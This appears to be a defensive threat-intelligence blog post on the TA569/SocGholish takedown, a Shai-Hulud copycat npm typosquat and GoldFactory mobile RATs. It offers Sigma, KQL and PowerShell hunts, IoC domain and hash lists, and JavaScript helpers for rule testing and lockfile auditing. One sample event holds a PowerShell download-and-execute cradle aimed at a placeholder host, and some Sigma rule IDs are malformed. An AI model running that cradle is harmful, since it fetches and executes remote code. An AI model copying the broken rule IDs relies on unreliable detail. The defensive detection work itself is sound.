
Operation Endgame Disruption & Shai-Hulud Supply Chain: TA569, GoldFactory, and NPM Threats

Security Arsenal Team
June 19, 2026

Recent OTX pulses indicate a volatile threat landscape characterized by high-profile law enforcement disruption operations, emerging supply chain attacks, and persistent social engineering campaigns.

Operation Endgame has successfully disrupted the notorious TA569 (GOLD PRELUDE) infrastructure, dismantling over 100 servers associated with the SocGholish fake browser update campaign. While this is a significant victory against a primary distributor of GhoLoader, FrigidStealer, and LockBit, TA569 is known for resilience and rapid infrastructure pivoting. Organizations must remain vigilant for "copycat" or residual infrastructure.

Simultaneously, the open-source ecosystem faces renewed threats with a copycat of the Shai-Hulud worm targeting the npm registry. Malicious packages such as chalk-tempalte are deploying infostealers and DDoS botnet capabilities via supply chain compromise.

Finally, the GoldFactory threat cluster is actively exploiting tax seasons in Indonesia and Peru using sophisticated phishing and vishing campaigns to distribute Gigabud.RAT and MMRat, abusing trusted government and financial brands.

Threat Actor / Malware Profile

TA569 (GOLD PRELUDE)

  • Malware Families: SocGholish, GhoLoader, FrigidStealer, WastedLocker, LockBit, RansomHub.
  • Distribution Method: SEO poisoning, compromised WordPress sites, and "Fake Browser Update" (FakeUpdates) web injects.
  • Payload Behavior: SocGholish acts as a dropper, fetching GhoLoader which then executes final payloads (stealers or ransomware).
  • C2 Communication: Uses HTTP/HTTPS to compromised legitimate domains to blend in with traffic.
  • Persistence: Scheduled tasks and registry run keys established by the initial loader.
  • Anti-Analysis: Obfuscated JavaScript and PowerShell code; domain generation algorithms (DGAs) in some variants.

Shai-Hulud Copycat

  • Malware Families: Shai-Hulud (Worm/Infostealer).
  • Distribution Method: Supply chain attack via typosquatting on npm (e.g., chalk-tempalte).
  • Payload Behavior: Upon installation via npm install, the package executes postinstall scripts reaching out to C2 for further instructions. Capabilities include credential theft and DDoS participation.
  • C2 Communication: Connections to random-looking subdomains on lhr.life.

GoldFactory

  • Malware Families: Gigabud.RAT, MMRat, Taotie.
  • Distribution Method: Phishing websites, WhatsApp social engineering (vishing), and fake mobile applications (APKs).
  • Payload Behavior: Mobile Remote Access Trojans (RATs) capable of screen recording, overlay attacks (HTML injection), and intercepting SMS 2FA codes.
  • C2 Communication: Uses shared infrastructure hosting over 16 abused brand domains.

IOC Analysis

The provided indicators cover a broad spectrum of the attack chain:

  • Hostnames/Domains: Primarily C2 infrastructure and distribution sites.
    • Operationalization: Feed into firewall blocklists and DNS resolvers. Note that TA569 often uses compromised legitimate sites, so blocking specific hostnames is safer than IP blocking to avoid collateral damage.
  • FileHash-SHA1: Specific samples of the Gigabud.RAT and related payloads from the GoldFactory campaign.
    • Operationalization: Upload to EDR solutions for quarantine. These hashes are critical for confirming historical infections on mobile devices or endpoints.
  • Tooling: Use AlienVault OTX or MISP to correlate these hashes with global campaigns. Use VirusTotal for deep binary analysis.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Fake Browser Update Activity - TA569 SocGholish
id: c48f9516-3f72-4f9b-8a0e-321e8430a9a2
status: experimental
description: Detects potential SocGholish fake browser update activity initiated by browser processes spawning PowerShell or cmd.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550173
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
            - 'copyitem'
    condition: selection
falsepositives:
    - Legitimate system administration tools launched via browser downloads
level: high
---
title: Suspicious NPM Package Execution - Shai-Hulud
id: d59e0627-4g83-5f0c-9b1f-432f9541b0a3
status: experimental
description: Detects execution of node.js processes making network connections to suspicious DGA-like domains associated with Shai-Hulud.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550174
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith:
            - '\node.exe'
        Initiated: 'true'
    filter_legit:
        DestinationHostname|endswith:
            - 'npmjs.org'
            - 'github.com'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate development tools accessing non-standard internal registries
level: medium
---
title: GoldFactory C2 Infrastructure Communication
id: e70f1738-5h94-6g1d-0c2g-543g0652c1b4
status: experimental
description: Detects network connections to known GoldFactory C2 domains used in Gigabud.RAT campaigns.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550175
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - 'sso-tha.com'
            - 'lhr.life'
    condition: selection
falsepositives:
    - Unknown
level: critical
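Before deploying the first rule above it helps to confirm exactly which process-creation events its selection block matches. The following is an added example, not code from the page or the Security Arsenal team: it transcribes the SocGholish rule's selection into JavaScript, applies Sigma's default case-insensitive string matching, and runs it over constructed sample events (the hostname in the sample command line is a placeholder, not a real indicator).

```javascript
// Added example (not the page's own code): evaluate the page's first Sigma rule,
// "Potential Fake Browser Update Activity - TA569 SocGholish", over constructed
// process_creation events so the selection logic can be tested before deployment.
// Matching is case-insensitive, as Sigma string modifiers are by default.

// The rule's selection block, transcribed from the page into a JS object.
const SOCGHOLISH_SELECTION = {
  'ParentImage|endswith': ['\\chrome.exe', '\\firefox.exe', '\\msedge.exe'],
  'Image|endswith': ['\\powershell.exe', '\\cmd.exe'],
  'CommandLine|contains': ['downloadstring', 'iex', 'copyitem'],
};

// Apply one Sigma field modifier to a single event value (OR across patterns).
function fieldMatches(value, modifier, patterns) {
  if (typeof value !== 'string') return false;
  const v = value.toLowerCase();
  return patterns.some((p) => {
    const needle = p.toLowerCase();
    switch (modifier) {
      case 'endswith': return v.endsWith(needle);
      case 'startswith': return v.startsWith(needle);
      case 'contains': return v.includes(needle);
      default: return v === needle; // no modifier: exact (case-insensitive) match
    }
  });
}

// A Sigma selection map is a logical AND over its keys; each key's value list is an OR.
function selectionMatches(selection, event) {
  return Object.entries(selection).every(([key, patterns]) => {
    const [field, modifier] = key.split('|');
    return fieldMatches(event[field], modifier, patterns);
  });
}

// Run the rule over a batch of events and return only the matching ones.
function hunt(events, selection = SOCGHOLISH_SELECTION) {
  return events.filter((e) => selectionMatches(selection, e));
}

// Constructed sample events (placeholder hostname, not a real IoC).
const SAMPLE_EVENTS = [
  { // browser spawning PowerShell with a download cradle: should match
    ParentImage: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: `powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://update.example.invalid/u.txt')"`,
  },
  { // same parent/child pairing but a benign command line: should not match
    ParentImage: 'C:\\Program Files\\Mozilla Firefox\\firefox.exe',
    Image: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'cmd.exe /c ver',
  },
  { // suspicious command line but not launched from a browser: outside this rule's scope
    ParentImage: 'C:\\Windows\\explorer.exe',
    Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell -c iex (gc .\\build.ps1 -raw)',
  },
];

for (const hit of hunt(SAMPLE_EVENTS)) {
  console.log(`[!] SocGholish-like activity: ${hit.ParentImage} -> ${hit.Image}`);
}
```

Only the first sample event matches. Note that `contains: 'iex'` is a plain substring test, so any command line whose path or arguments happen to contain those three letters will also fire; running the rule over a sample of benign telemetry this way is the quickest check before raising the level to high in production.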

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for GoldFactory and Shai-Hulud network indicators.
// Run each of the two queries below on its own; the hunting editor executes one query at a time.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "platform.exathomeswebuyarizona.com",
    "js-new.newtoyourgame.com",
    "87e0bbc636999b.lhr.life",
    "edcf8b03c84634.lhr.life",
    "sso-tha.com"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend IoC_Type = "C2_Domain"

// Hunt for malicious file hashes (GoldFactory).
// "in~" is the case-insensitive set membership operator; KQL has no "in_any".
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA1 in~ (
    "004d80e0efe9ea4d572350e8ce4771dfa432f0a2",
    "00fcb2abd35049ad3cc9a8a3e1aaba156c0770cf",
    "02462bace6937e92f3d1ef35f08c4ad270082104",
    "036aa79692470ad8d6a3bedb5da310af111317af",
    "03a1bcd3ba59c02ce6c37699baa73a2c075a6644"
)
| project Timestamp, DeviceName, FileName, SHA1, InitiatingProcessAccountName
| extend IoC_Type = "Malware_Hash"

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for SocGholish and Shai-Hulud Indicators of Compromise.
.DESCRIPTION
    Checks DNS Cache for malicious domains and running processes for suspicious connections.
#>

$MaliciousDomains = @(
    "platform.exathomeswebuyarizona.com",
    "js-new.newtoyourgame.com",
    "87e0bbc636999b.lhr.life",
    "edcf8b03c84634.lhr.life",
    "sso-tha.com"
)

Write-Host "[+] Checking DNS Cache for malicious domains..."
$DNSCache = Get-DnsClientCache
foreach ($domain in $MaliciousDomains) {
    $hit = $DNSCache | Where-Object { $_.Entry -like "*$domain*" }
    if ($hit) {
        Write-Host "[!] ALERT: Found malicious domain in DNS cache: $($domain)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for active connections to suspicious endpoints..."
# Reverse-resolve each established remote address and compare it with the indicator list
$TCPConnections = Get-NetTCPConnection -State Established
foreach ($conn in $TCPConnections) {
    $ProcessName = (Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue).ProcessName
    $RemoteIP = $conn.RemoteAddress
    try {
        $RemoteHost = [System.Net.Dns]::GetHostEntry($RemoteIP).HostName
        foreach ($domain in $MaliciousDomains) {
            if ($RemoteHost -like "*$domain*") {
                Write-Host "[!] ALERT: Active connection to $domain detected via $ProcessName (PID: $($conn.OwningProcess))" -ForegroundColor Red
            }
        }
    } catch {
        # Reverse DNS lookup failed, ignore
    }
}

Write-Host "[+] Hunt complete."

Response Priorities

Immediate

  • Block all listed hostnames and domains at the proxy and firewall level.
  • Scan all web servers for WordPress compromises indicative of SocGholish injections.
  • Quarantine any endpoints matching the GoldFactory SHA1 hashes.

24h

  • Conduct an audit of package.json files and installed npm packages in development environments for chalk-tempalte, @deadcode09284814/axios-util, or axois-utils.
  • Review user accounts associated with processes connecting to the identified IOCs for potential credential theft.
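One way to carry out the package audit above, as an added example that is not the page's or the Security Arsenal team's tooling: the Node script below walks a lockfileVersion 2 or 3 package-lock.json and reports the three package names listed in this report, dependencies that declare install-time lifecycle scripts (the mechanism the Shai-Hulud copycat relies on when npm install runs), and, going one step beyond the exact names on the page, near-misses of a small assumed list of legitimate package names. The lockfile contents are constructed for the example.

```javascript
// Added example (not the page's own script): audit an npm package-lock.json for
// the packages named in this report, for dependencies that run install-time
// lifecycle scripts, and for typosquat-style near-misses of legitimate names.
// Assumes lockfileVersion 2 or 3 ("packages" map keyed by node_modules path).

// Package names taken from the report's 24h action item.
const BLOCKLIST = new Set(['chalk-tempalte', '@deadcode09284814/axios-util', 'axois-utils']);

// Legitimate names that typosquats commonly imitate (assumed list; extend to your own dependencies).
const IMITATED_NAMES = ['chalk-template', 'axios', 'lodash'];

// Derive the package name from a lockfile "packages" key such as
// "node_modules/a/node_modules/@scope/b" -> "@scope/b".
function nameFromLockKey(key) {
  const marker = 'node_modules/';
  const idx = key.lastIndexOf(marker);
  return idx === -1 ? key : key.slice(idx + marker.length);
}

// Damerau-Levenshtein distance (optimal string alignment), so that a single
// transposition such as "tempalte" vs "template" counts as one edit.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Walk the lockfile and return findings as { name, version, reason } objects.
function auditLockfile(lock) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    if (key === '') continue; // the root project entry
    const name = nameFromLockKey(key);
    if (BLOCKLIST.has(name)) {
      findings.push({ name, version: meta.version, reason: 'listed in report' });
      continue;
    }
    const lookalike = IMITATED_NAMES.find((n) => n !== name && editDistance(name, n) <= 2);
    if (lookalike) {
      findings.push({ name, version: meta.version, reason: `possible typosquat of ${lookalike}` });
    }
    // npm sets hasInstallScript when a package declares preinstall/install/postinstall.
    if (meta.hasInstallScript) {
      findings.push({ name, version: meta.version, reason: 'runs install lifecycle script' });
    }
  }
  return findings;
}

// Constructed sample lockfile (versions and the nested "foo" parent are made up).
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/chalk': { version: '5.3.0' },
    'node_modules/chalk-tempalte': { version: '1.0.1', hasInstallScript: true },
    'node_modules/lodahs': { version: '4.17.21' },
    'node_modules/esbuild': { version: '0.21.5', hasInstallScript: true },
    'node_modules/foo/node_modules/@deadcode09284814/axios-util': { version: '0.0.3' },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  console.log(`[!] ${f.name}@${f.version}: ${f.reason}`);
}
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(require('fs').readFileSync('package-lock.json', 'utf8'))`. Install-script findings are a review queue rather than verdicts: legitimate native-module packages also declare postinstall hooks, so the point is to enumerate every package that can execute code at install time and confirm each one is expected, which is also the list to feed into the allowlisting workflow the 1 Week items describe.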

1 Week

  • Implement strict allowlisting for npm packages and enforce dependency review workflows.
  • Enhance mobile device management (MDM) policies to block sideloading of apps (for GoldFactory mitigation).
  • Update security awareness training to include "Fake Browser Update" and "Tax/Vishing" social engineering tactics.
